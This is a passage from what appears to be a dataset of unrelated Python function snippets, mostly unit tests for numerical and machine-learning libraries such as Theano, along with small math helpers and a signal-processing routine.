4)\n self.assertAlmostEqual(a[0], 0.5*(1**2 + 2**2))\n self.assertAlmostEqual(a[1], 1.5)", "def past_weight_grad_calculator2(xs, es, kp_x, kd_x, kp_e, kd_e, shapes):\n kp_x, kd_x, kp_e, kd_e = [as_floatx(k) for k in (kp_x, kd_x, kp_e, kd_e)]\n n_samples, n_in, n_out = shapes\n rx = kd_x/(kp_x+kd_x)\n re = kd_e/(kp_e+kd_e)\n\n xr = create_shared_variable(np.zeros((n_samples, n_in)))\n er = create_shared_variable(np.zeros((n_samples, n_out)))\n\n\n\n\n # xr_new = xr*rx + xs/(kp_x+kd_x)\n # er_new = er*re + es/(kp_e+kd_e)\n\n arr = rx*re/(1-rx*re)\n\n xr_new = xr*arr + xs/(kp_x+kd_x)\n er_new = er*arr + es/(kp_e+kd_e)\n\n xsum = create_shared_variable(np.zeros((n_samples, n_in)))\n esum = create_shared_variable(np.zeros((n_samples, n_out)))\n\n xsum_new = xsum+xr_new\n esum_new = esum+er_new\n\n x_nospikes = tt.eq(xs, 0)\n e_nospikes = tt.eq(es, 0)\n\n dw = xs.T.dot(esum_new) + xsum_new.T.dot(es)\n\n add_update(xr, xr_new)\n add_update(er, er_new)\n add_update(xsum, xsum_new*x_nospikes)\n add_update(esum, esum_new*e_nospikes)\n\n return xs.T.dot(er) + xr.T.dot(es)\n # return xr.T.dot(er)\n # return dw", "def _evaluable_view(self, stencil, arr, offset=0):\n if self.dim == 1:\n if isinstance(stencil, Stencil):\n\n l = self.borders[0]-stencil.b[0][0]\n r = -(self.borders[1]-stencil.b[0][1])\n else:\n l = self.borders[0]-stencil[0][0]\n r = -(self.borders[1]-stencil[0][1])\n return arr[l+offset: r+offset]\n else:\n raise NotImplementedError(\"Another dimension than one \"\n \"is not supplied\")", "def _test_parse_function(self, idx):\n left_image = self.left_images[idx]\n right_image = self.right_images[idx]\n\n paddings = self.get_paddings()\n left_image = tf.pad(tf.expand_dims(left_image, 0), paddings, \"CONSTANT\")\n right_image = tf.pad(tf.expand_dims(right_image, 0), paddings, \"CONSTANT\")\n\n return left_image, right_image", "def test_elemwise_composite_support_code():\r\n X = tcn.shared_constructor(value=numpy.zeros((100, 10), dtype=\"float32\"),\r\n name='X')\r\n W = tcn.shared_constructor(value=numpy.zeros((10, 1), dtype=\"float32\"),\r\n name='W')\r\n U = 
T.dot(X, W)\r\n Y = tcn.shared_constructor(value=numpy.zeros((100, 1), dtype=\"float32\"),\r\n name='Y')\r\n P = T.exp(-(Y - U) ** 2)\r\n epsilon = numpy.asarray(0.001, dtype=\"float32\")\r\n NLL = -T.mean(T.log(P + epsilon)) # SupportCodeError\r\n G = theano.gradient.grad(NLL, wrt=[W])\r\n\r\n backup = theano.config.warn.identify_1pexp_bug\r\n theano.config.warn.identify_1pexp_bug = False\r\n try:\r\n f_grad = theano.function(inputs=[], outputs=G, mode=mode_with_gpu)\r\n finally:\r\n theano.config.warn.identify_1pexp_bug = backup\r\n f_grad()\r\n\r\n topo = f_grad.maker.fgraph.toposort()\r\n assert sum([isinstance(node.op, T.Elemwise) for node in topo]) == 1\r\n #I suspect this was failing in the original branch too\r\n assert sum([isinstance(node.op, tcn.GpuElemwise) for node in topo]) == 1", "def local_func(f, t, x, w):\n x_func = np.zeros_like(t, dtype='f')\n for i, jd in enumerate(t.jd):\n sel = (t.jd >= (jd - w)) & (t.jd <= (jd + w))\n x_func[i] = f(x[sel])\n return x_func", "def test_y_before_x(self):", "def test_mod():\r\n x, y = fscalars('xy')\r\n fn = gof.DualLinker().accept(\r\n gof.FunctionGraph([x, y], [x % y])).make_function()\r\n for a, b in ((0, 1), (1, 1), (0, -1), (1, -1), (-1, -1),\r\n (1, 2), (-1, 2), (1, -2), (-1, -2),\r\n (5, 3), (-5, 3), (5, -3), (-5, -3)\r\n ):\r\n assert fn(a, b) == a % b, (a,)", "def test_exp_2ndord_2vars():\n x, y = fwd.Variable(), fwd.Variable()\n f = fwd.exp(x/y)\n df_dxdy = lambda x, y: -(x*np.exp(x/y) + y*np.exp(x/y)) / y**3\n assert equals(f.derivative_at((x, x), {x: 1.5, y:2.5}, order=2),\n f.derivative_at( x, {x: 1.5, y:2.5}, order=2)) \n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n f.derivative_at((y, x), {x: 1.5, y:2.5}, order=2))\n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n df_dxdy(1.5, 2.5))", "def test_deep(self, expr, result, mode):\n i, j, k, l = dimify('i j k l')\n a = symbol(name='a', dimensions=(i, j, k, l), value=2., mode=mode)\n b = symbol(name='b', dimensions=(j, k), value=3., mode=mode)\n fa = a.base.function if mode == 'indexed' else a\n fb = b.base.function if mode == 'indexed' else b\n\n eqn = eval(expr)\n Operator(eqn)(fa, fb)\n assert np.allclose(fa.data, result, rtol=1e-12)", "def test_nofission_as_illegal():\n grid = Grid(shape=(20, 20))\n x, y = grid.dimensions\n\n f = Function(name='f', grid=grid, dimensions=(y,), shape=(20,))\n u = TimeFunction(name='u', grid=grid)\n v = TimeFunction(name='v', grid=grid)\n\n eqns = [Inc(f, v + 1.),\n Eq(u.forward, f[y + 1] + 1.)]\n\n op = Operator(eqns, opt='fission')\n\n assert_structure(op, ['t,x,y', 't,x,y'], 't,x,y,y')", "def user_function(x, y):\r\n return x ** 2 + 2 * y ** 2", "def are_these_two_locations_visible_to_each_other(first_x, first_y, second_x, second_y, can_see_past_function):\n are_visible = True\n if first_x == second_x:\n direction = utilities.sign(second_y - first_y)\n for i in range(first_y + direction, second_y, direction):\n if not can_see_past_function(first_x, i):\n are_visible = False\n break\n elif first_y == second_y:\n direction = utilities.sign(second_x - first_x)\n for i in range(first_x + direction, second_x, direction):\n if not can_see_past_function(i, first_y):\n are_visible = False\n break\n else:\n are_visible = False\n return are_visible", "def test_local_sigm_times_exp(self):\r\n def match(func, ops):\r\n #print [node.op.scalar_op for node in func.maker.fgraph.toposort()]\r\n assert [node.op for node in func.maker.fgraph.toposort()] == ops\r\n m = self.get_mode(excluding=['local_elemwise_fusion', 
'inplace'])\r\n x, y = tensor.vectors('x', 'y')\r\n\r\n f = theano.function([x], sigmoid(-x) * tensor.exp(x), mode=m)\r\n match(f, [sigmoid])\r\n\r\n f = theano.function([x], sigmoid(x) * tensor.exp(-x), mode=m)\r\n match(f, [tensor.neg, sigmoid])\r\n\r\n f = theano.function([x], -(-(-(sigmoid(x)))) * tensor.exp(-x), mode=m)\r\n match(f, [tensor.neg, sigmoid, tensor.neg])\r\n\r\n f = theano.function(\r\n [x, y],\r\n (sigmoid(x) * sigmoid(-y) * -tensor.exp(-x) *\r\n tensor.exp(x * y) * tensor.exp(y)),\r\n mode=m)\r\n match(f, [sigmoid, tensor.mul, tensor.neg, tensor.exp, sigmoid,\r\n tensor.mul])", "def test_gradable_funcs(self):\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = None\n\n self.basic_lindblad.evaluation_mode = \"dense_vectorized\"\n\n self.jit_grad_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([0.2, 0.4, 0.6, 0.8]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_grad_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([0.2, 0.4, 0.6, 0.8]))\n )\n\n self.basic_lindblad.rotating_frame = None", "def test_COPYxi():\n\tk, outputs = 2, [0,0,1,1]\n\t# Prime Implicants\n\ttrue_pi0s = set(['02'])\n\ttrue_pi1s = set(['12'])\n\n\ttdt0, tdt1 = make_transition_density_tables(k=k, outputs=outputs)\n\tpi0s, pi1s = find_implicants_qm(tdt0) , find_implicants_qm(tdt1)\n\n\tassert (pi0s == true_pi0s) , ('Prime Implicants for 0 does not match. %s != %s' % (pi0s,true_pi0s))\n\tassert (pi1s == true_pi1s) , ('Prime Implicants for 1 does not match. %s != %s' % (pi1s,true_pi1s))\n\t# Two Symbols\n\ttrue_ts0s = [('02',[],[])]\n\ttrue_ts1s = [('12',[],[])]\n\n\tts0s,ts1s = find_two_symbols_v2(k=k, prime_implicants=pi0s) , find_two_symbols_v2(k=k, prime_implicants=pi1s)\n\n\tassert (ts0s == true_ts0s) , ('Two Symbol for 0 does not match. %s != %s' % (ts0s,true_ts0s))\n\tassert (ts1s == true_ts1s) , ('Two Symbol for 1 does not match. 
%s != %s' % (ts1s,true_ts1s))", "def test_shadowing(x, y, z):\n x = x * y\n y = y * z\n z = x * z\n return x + y + z", "def test_var_idx_in_modes(self, arr, parse_input_mocked_metadata):\n bb = parse_input_mocked_metadata(\n \"int array vars =\\n{}\\nMZgate(0, 1) | [vars[0], vars[1], vars[2]]\".format(arr)\n )\n assert bb.operations == [\n {'op': 'MZgate', 'args': [0, 1], 'kwargs': {}, 'modes': [1, 2, 3]}\n ]", "def test_simple_funcs(self):\r\n variables = {'x': 4.712}\r\n functions = {'id': lambda x: x}\r\n self.assertEqual(calc.evaluator({}, functions, 'id(2.81)'), 2.81)\r\n self.assertEqual(calc.evaluator({}, functions, 'id(2.81)'), 2.81)\r\n self.assertEqual(calc.evaluator(variables, functions, 'id(x)'), 4.712)\r\n\r\n functions.update({'f': numpy.sin})\r\n self.assertAlmostEqual(\r\n calc.evaluator(variables, functions, 'f(x)'),\r\n -1, delta=1e-3\r\n )", "def test_ex_2_2(self):\n wam = WAM()\n compiler = Compiler()\n X = Variable()\n Y = Variable()\n var_idxes = {}\n a1 = compiler.write_to_heap(Compound('f', X, Compound('g', X, Atom('a'))), wam, var_idxes)\n a2 = compiler.write_to_heap(Compound('f', Atom('b'), Y), wam, var_idxes)\n aX = var_idxes[X]\n aY = var_idxes[Y]\n wam.unify(a1, a2)\n self.assertEqual(wam.get_term_repr(aX), 'b')\n self.assertEqual(wam.get_term_repr(aY), 'g(b, a)')", "def test_mul_2ndord_2vars():\n x, y = fwd.Variable(), fwd.Variable()\n f = x**2 * y**2\n assert equals(f.derivative_at((x, x), {x: 1.5, y:2.5}, order=2), \n f.derivative_at( x, {x: 1.5, y:2.5}, order=2)) \n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n f.derivative_at((y, x), {x: 1.5, y:2.5}, order=2))\n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n 4.0*1.5*2.5)", "def test_sum_pos_4() -> None:\n # Third step, 4th square.\n assert nth(sw.sum_walk(), 2) == 4", "def sampleFunction2(x2: int, y2: float) -> float:\n return x2 * y2", "def test_bit_and_offset_out_of_range(self):\n value = bytearray()\n value.append(0)\n ops = [bitwise_operations.bit_and(self.five_255_bin, 41, 8, 1, value, None)]\n\n with pytest.raises(e.OpNotApplicable):\n self.as_connection.operate(self.test_key, ops)", "def test_multiple_case(self):\r\n\r\n shp = (3, 3)\r\n fx, fy, fz, fw = fmatrices('xyzw')\r\n dx, dy, dz, dw = dmatrices('xyzw')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fwv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dwv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float64').reshape(1, shp[0])\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n old_optimizer = mode._optimizer\r\n try:\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.including('ShapeOpt')\r\n mode._optimizer = mode._optimizer.excluding(\r\n 'local_elemwise_fusion')\r\n\r\n #test x / x -> 
1\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([(fx/fx,[fx],[fxv],'float32'),\r\n (dx/dx,[dx],[dxv],'float64'),\r\n (fv/fv,[fv],[fvv],'float32'),\r\n (dv/dv,[dv],[dvv],'float64'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert (out == numpy.ones(shp, dtype=out_dtype)).all()\r\n topo = f.maker.fgraph.toposort()\r\n if sym_inputs[0].broadcastable[0]:\r\n assert len(topo) == 2\r\n assert isinstance(topo[0].op, Shape_i)\r\n assert isinstance(topo[1].op, tensor.Alloc)\r\n else:\r\n assert len(topo) == 3\r\n assert isinstance(topo[0].op, Shape_i)\r\n assert isinstance(topo[1].op, Shape_i)\r\n assert isinstance(topo[2].op, tensor.Alloc)\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (x * y) / x -> y\r\n for id,(g, sym_inputs, val_inputs, nb_elemwise, out_dtype) in enumerate([\r\n ((dx*dy)/dx,[dx,dy],[dxv,dyv],0,'float64'),\r\n ((fx*fy)/fx,[fx,fy],[fxv,fyv],0,'float32'),\r\n ((dv*dy)/dv,[dv,dy],[dvv,dyv],0,'float64'),\r\n ((fv*fy)/fv,[fv,fy],[fvv,fyv],0,'float32'),\r\n #must broadcast as their is a dimshuffle in the computation\r\n ((dx*dv)/dx,[dx,dv],[dxv,dvv],1,'float64'),\r\n #topo: [Elemwise{second,no_inplace}(x, <TensorType(float64, row)>)]\r\n ((fx*fv)/fx,[fx,fv],[fxv,fvv],1,'float32')\r\n #topo: [Elemwise{second,no_inplace}(x, <TensorType(float32, row)>)]\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert(out_dtype == out.dtype)\r\n assert numpy.allclose(out, val_inputs[1])\r\n topo = f.maker.fgraph.toposort()\r\n print \"ID TOPO\", id, topo, sym_inputs\r\n for r, t in f.maker.fgraph.shape_feature.shape_of.items():\r\n print ' ', r, t\r\n if topo and not(len(topo)==1 and topo[0].op==deep_copy_op):\r\n for node in topo[:-1]:\r\n assert isinstance(node.op, Shape_i)\r\n assert isinstance(topo[-1].op, tensor.Alloc)\r\n\r\n #test x / y / x -> 1 / y\r\n for id,(g, sym_inputs, val_inputs, nb_elemwise, out_dtype) in enumerate([\r\n ((dx/dy)/dx,[dx,dy],[dxv,dyv],1,'float64'),\r\n ((fx/fy)/fx,[fx,fy],[fxv,fyv],1,'float32'),\r\n ((dv/dy)/dv,[dv,dy],[dvv,dyv],1,'float64'),\r\n ((fv/fy)/fv,[fv,fy],[fvv,fyv],1,'float32'),\r\n #must broadcast as their is a dimshuffle in the computation\r\n\r\n ((dx/dv)/dx,[dx,dv],[dxv,dvv],1,'float64'),\r\n #topo: [Shape_i, Shape_i, Elemwise{inv,no_inplace}(<TensorType(float64, row)>), Alloc]\r\n ((fx/fv)/fx,[fx,fv],[fxv,fvv],1,'float32'),\r\n #topo:[Shape_i, Shape_i, Elemwise{inv,no_inplace}(<TensorType(float32, row)>), Alloc]\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (1 / val_inputs[1]))\r\n topo = f.maker.fgraph.toposort()\r\n print topo\r\n elem = [t for t in topo if isinstance(t.op, T.Elemwise)]\r\n assert len(elem) == nb_elemwise\r\n assert isinstance(elem[0].op, (T.Elemwise, ))\r\n assert isinstance(elem[0].op.scalar_op, (\r\n theano.scalar.basic.Inv, theano.scalar.basic.TrueDiv))\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (a / b) * (b / c) * (c / d) -> a / d\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((dx / dy) * (dy / dz) * (dz / dw),[dx,dy,dz,dw],[dxv,dyv,dzv,dwv],'float64'),\r\n ((fx / fy) * (fy / fz) * (fz / fw),[fx,fy,fz,fw],[fxv,fyv,fzv,fwv],'float32'),\r\n ((dv / dy) * (dy / dz) * (dz / dw),[dv,dy,dz,dw],[dvv,dyv,dzv,dwv],'float64'),\r\n ((fv / fy) * (fy / fz) * (fz / fw),[fv,fy,fz,fw],[fvv,fyv,fzv,fwv],'float32'),\r\n ((dx / dv) * (dv / dz) * (dz / dw),[dx,dv,dz,dw],[dxv,dvv,dzv,dwv],'float64'),\r\n ((fx / fv) * 
(fv / fz) * (fz / fw),[fx,fv,fz,fw],[fxv,fvv,fzv,fwv],'float32'),\r\n ((dx / dy) * (dy / dv) * (dv / dw),[dx,dy,dv,dw],[dxv,dyv,dvv,dwv],'float64'),\r\n ((fx / fy) * (fy / fv) * (fv / fw),[fx,fy,fv,fw],[fxv,fyv,fvv,fwv],'float32'),\r\n ((dx / dy) * (dy / dz) * (dz / dv),[dx,dy,dz,dv],[dxv,dyv,dzv,dvv],'float64'),\r\n ((fx / fy) * (fy / fz) * (fz / fv),[fx,fy,fz,fv],[fxv,fyv,fzv,fvv],'float32'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (val_inputs[0] / val_inputs[3]))\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 1\r\n assert isinstance(topo[0].op, (T.Elemwise, ))\r\n assert isinstance(topo[0].op.scalar_op,\r\n theano.scalar.basic.TrueDiv)\r\n assert len(topo[0].inputs) == 2\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (2.0 * x) / (4.0 * y) -> (0.5 * x) / y\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n (((2.0*dx)/(4.0*dy)),[dx,dy],[dxv,dyv],'float64'),\r\n (((2.0*fx)/(4.0*fy)),[fx,fy],[fxv,fyv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (((2.0*dv)/(4.0*dy)),[dv,dy],[dvv,dyv],'float64'),\r\n (((2.0*fv)/(4.0*fy)),[fv,fy],[fvv,fyv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (((2.0*dx)/(4.0*dv)),[dx,dv],[dxv,dvv],'float64'),\r\n (((2.0*fx)/(4.0*fv)),[fx,fv],[fxv,fvv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (0.5 *\r\n val_inputs[0] / val_inputs[1]))\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 2\r\n assert isinstance(topo[0].op, (T.Elemwise, ))\r\n assert isinstance(topo[0].op.scalar_op,\r\n theano.scalar.basic.Mul)\r\n assert len(topo[0].inputs) == 2\r\n assert isinstance(topo[1].op, (T.Elemwise, ))\r\n assert isinstance(topo[1].op.scalar_op,\r\n theano.scalar.basic.TrueDiv)\r\n assert len(topo[1].inputs) == 2\r\n assert(out_dtype == out.dtype)\r\n\r\n #test 2 * x / 2 -> x\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((2*dx)/2,[dx],[dxv],'float64'),\r\n ((2*fx)/2,[fx],[fxv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2*dv)/2,[dv],[dvv],'float64'),\r\n ((2*fv)/2,[fv],[fvv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, val_inputs[0])\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 1\r\n topo[0].op == deep_copy_op\r\n assert(out_dtype == out.dtype)\r\n\r\n #test x / abs(x) -> sign(x)\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n (dx/abs(dx),[dx],[0.5-dxv],'float64'),\r\n (fx/abs(fx),[fx],[0.5-fxv], 'float32'),\r\n (dx/abs(dx),[dx],[0.1*dxv],'float64'),\r\n (fx/abs(fx),[fx],[0.1*fxv], 'float32'),\r\n (dv/abs(dv),[dv],[0.5-dvv],'float64'),\r\n (fv/abs(fv),[fv],[0.5-fvv], 'float32'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.all(numpy.isfinite(out))\r\n assert numpy.allclose(out, numpy.sign(val_inputs[0]))\r\n assert(out_dtype == out.dtype)\r\n assert len(f.maker.fgraph.toposort()) == 1\r\n\r\n #test (2*x) / (3*abs(x)) -> sign(x)\r\n for id, (g, 
sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((2 * dx) / (3 * abs(dx)), [dx], [0.5 - dxv], 'float64'),\r\n ((2 * fx) / (3 * abs(fx)), [fx], [0.5 - fxv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2 * dx) / (3 * abs(dx)), [dx], [0.1 * dxv], 'float64'),\r\n ((2 * fx) / (3 * abs(fx)), [fx], [0.1 * fxv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2 * dv) / (3 * abs(dv)), [dv], [0.5 - dvv], 'float64'),\r\n ((2 * fv) / (3 * abs(fv)), [fv], [0.5 - fvv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n topo = f.maker.fgraph.toposort()\r\n out = f(*val_inputs)\r\n assert numpy.all(numpy.isfinite(out))\r\n assert numpy.allclose(out, numpy.sign(val_inputs[0]) * 2 / 3)\r\n assert(out_dtype == out.dtype)\r\n finally:\r\n mode._optimizer = old_optimizer", "def axpby(alpha,pepx1,beta,pepx2):\n\n pepx_new = add(mul(alpha,pepx1),mul(beta,pepx))\n return pepx_new", "def TestFunc1(x):\r\n return 12*x[0]*x[0] + 4*x[1]*x[1] - 12*x[0]*x[1] + 2*x[1]", "def TestFunc2(x):\r\n return 10*(-0.02*x[0] + 0.5*x[0]*x[0] + x[1])**2 \\\r\n + 128*(-0.02*x[0] + 0.5*x[0]*x[0] - x[1]/4) \\\r\n - (8e-5)*x[0]", "def test_advinc_subtensor1():\r\n for shp in [(3, 3), (3, 3, 3)]:\r\n shared = gpuarray_shared_constructor\r\n xval = numpy.arange(numpy.prod(shp), dtype='float32').reshape(shp) + 1\r\n yval = numpy.empty((2,) + shp[1:], dtype='float32')\r\n yval[:] = 10\r\n x = shared(xval, name='x')\r\n y = tensor.tensor(dtype='float32',\r\n broadcastable=(False,) * len(shp),\r\n name='y')\r\n expr = tensor.advanced_inc_subtensor1(x, y, [0, 2])\r\n f = theano.function([y], expr, mode=mode_with_gpu)\r\n assert sum([isinstance(node.op, GpuAdvancedIncSubtensor1)\r\n for node in f.maker.fgraph.toposort()]) == 1\r\n rval = f(yval)\r\n rep = xval.copy()\r\n rep[[0, 2]] += yval\r\n assert numpy.allclose(rval, rep)", "def CalcGreenFunctions(x, y, z, x_src_l, y_src_l, alpha, dire, Lambda_y, \\\n gamma_l, c, omega, G_sen, dir_meas, dir_meas_deg, airloss_alpha, f, n):\n \n G = greens_fct(repmat(x_src_l, np.shape(x)[0],1), repmat(y_src_l, np.shape(y)[0],1), omega, c, \\\n np.transpose(repmat(x, np.shape(x_src_l)[0], 1)), np.transpose(repmat(y, np.shape(y_src_l)[0], 1)), z)\n\n G = G_sen * G\n \n beta = np.arcsin((np.transpose(repmat(y, np.shape(y_src_l)[0], 1)) - repmat(y_src_l, np.shape(y)[0], 1)) \\\n * np.sqrt((np.transpose(repmat(x, np.shape(x_src_l)[0], 1)) - \\\n repmat(x_src_l, np.shape(x)[0], 1))**2 + \\\n (np.transpose(repmat(y, np.shape(y_src_l)[0], 1)) - repmat(y_src_l, np.shape(y)[0], 1))**2)**(-1)) \\\n + repmat(gamma_l, np.shape(x)[0], 1)\n \n # air attenuation\n src_rec_dist = np.sqrt((np.transpose(repmat(x, np.shape(x_src_l)[0], 1)) - repmat(x_src_l, np.shape(x)[0], 1))**2 \\\n + (np.transpose(repmat(y, np.shape(y_src_l)[0], 1)) - repmat(y_src_l, np.shape(y)[0], 1))**2)\n \n air_att = airloss_alpha * src_rec_dist\n air_att = 10**(-air_att / 20)\n G = G * air_att\n \n H_post = calc_directivity(dire, alpha, Lambda_y, beta, omega, c, f, dir_meas, dir_meas_deg, n)\n\n G = G * H_post\n \n return G", "def test_sum_pos_2() -> None:\n # Note: We take 1 step (first item) - thus end up on square 2\n # (square 1 being home).\n assert nth(sw.sum_walk(), 0) == 1", "def test_eq():\n\n def myfunc1(x,y):\n f1=1*x*y*2\n return f1\n\n def myfunc2(x,y):\n f1=1*x*y*4\n 
return f1\n\n f_obj1=ADiff(myfunc1)\n res1 = f_obj1 == f_obj1\n f_obj2=ADiff(myfunc2)\n res2 = f_obj1 == f_obj2\n\n assert res1==True and res2==False", "def test_member_input_flags(self):\r\n\r\n if config.mode == 'FAST_COMPILE':\r\n return\r\n\r\n M = Module()\r\n M.x = T.dvector()\r\n M.y = T.dvector()\r\n xval= numpy.asarray([0, 0.5])\r\n M.f = Method([io.In(M.x,\r\n mutable=True,\r\n update=(M.x - M.y),\r\n value=xval)], M.x + M.y)\r\n m = M.make()\r\n m.y = numpy.asarray([1, 2])\r\n\r\n assert numpy.all(m.f(xval) == [1, 2.5])\r\n assert numpy.all(xval == [-1, -1.5])", "def check_affine_equivalence(f, g, A, a, B, b):\n for x in range(0, 2**N):\n y = oplus(x, a)\n y = apply_bin_mat(y, A)\n y = g[y]\n y = apply_bin_mat(y, B)\n y = oplus(y, b)\n if y != f[x]:\n return False\n return True", "def f_raw(x, a, b):\n return a * x + b", "def test_function2(a, b):\n x = a + b\n y = a * b\n return x, y, x<y, x>y # < to ensure HTML is properly escaped", "def test_k_index():\n pressure = np.array([1014., 1000., 997., 981.2, 947.4, 925., 914.9, 911.,\n 902., 883., 850., 822.3, 816., 807., 793.2, 770.,\n 765.1, 753., 737.5, 737., 713., 700., 688., 685.,\n 680., 666., 659.8, 653., 643., 634., 615., 611.8,\n 566.2, 516., 500., 487., 484.2, 481., 475., 460.,\n 400.]) * units.hPa\n temperature = np.array([24.2, 24.2, 24., 23.1, 21., 19.6, 18.7, 18.4,\n 19.2, 19.4, 17.2, 15.3, 14.8, 14.4, 13.4, 11.6,\n 11.1, 10., 8.8, 8.8, 8.2, 7., 5.6, 5.6,\n 5.6, 4.4, 3.8, 3.2, 3., 3.2, 1.8, 1.5,\n -3.4, -9.3, -11.3, -13.1, -13.1, -13.1, -13.7, -15.1,\n -23.5]) * units.degC\n dewpoint = np.array([23.2, 23.1, 22.8, 22., 20.2, 19., 17.6, 17.,\n 16.8, 15.5, 14., 11.7, 11.2, 8.4, 7., 4.6,\n 5., 6., 4.2, 4.1, -1.8, -2., -1.4, -0.4,\n -3.4, -5.6, -4.3, -2.8, -7., -25.8, -31.2, -31.4,\n -34.1, -37.3, -32.3, -34.1, -37.3, -41.1, -37.7, -58.1,\n -57.5]) * units.degC\n ki = k_index(pressure, temperature, dewpoint)\n assert_almost_equal(ki, 33.5 * units.degC, 2)", "def test_1d_2d(self):\n \n self.assertEqual(len(self.storage), 0)\n \n @interpolated(self.storage, max_distance=0.75)\n def func(x):\n return [x**2, x]\n \n a = func(1)\n self.assertEqual(len(self.storage), 1)\n self.assertAllClose(a, [1**2, 1])\n \n a = func(2)\n self.assertEqual(len(self.storage), 2)\n self.assertAllClose(a, [2**2, 2])\n \n a = func(1)\n self.assertEqual(len(self.storage), 2)\n self.assertAllClose(a, [1**2, 1])\n \n a = func(1.5)\n self.assertEqual(len(self.storage), 2)\n self.assertAlmostEqual(a[0], 0.5*(1**2 + 2**2))\n self.assertAlmostEqual(a[1], 1.5)", "def mul_fns(f_and_df, g_and_dg):\n \"*** YOUR CODE HERE ***\"", "def find_caliblamp_offset(spec1, spec2, colname1='flux', colname2='flux',\n aperture_k=None, pixel_k=None, pixel_range=(-30, 30),\n max_order_offset=20,\n mode='normal'):\n\n if isinstance(pixel_range, int) or isinstance(pixel_range, float):\n if pixel_range <=0:\n print('Error: pixel_range must be positive')\n raise ValueError\n pixel_range = int(pixel_range)\n pixel_shift_lst = np.arange(-pixel_range, pixel_range)\n elif isinstance(pixel_range, list) or isinstance(pixel_range, tuple):\n if len(pixel_range)<2:\n print('Error: pixel_range must have length of 2')\n raise ValueError\n if pixel_range[0] >= pixel_range[1]:\n print('Error: pixel_range error')\n raise ValueError\n pixel_shift_lst = np.arange(pixel_range[0], pixel_range[1])\n else:\n pass\n\n if 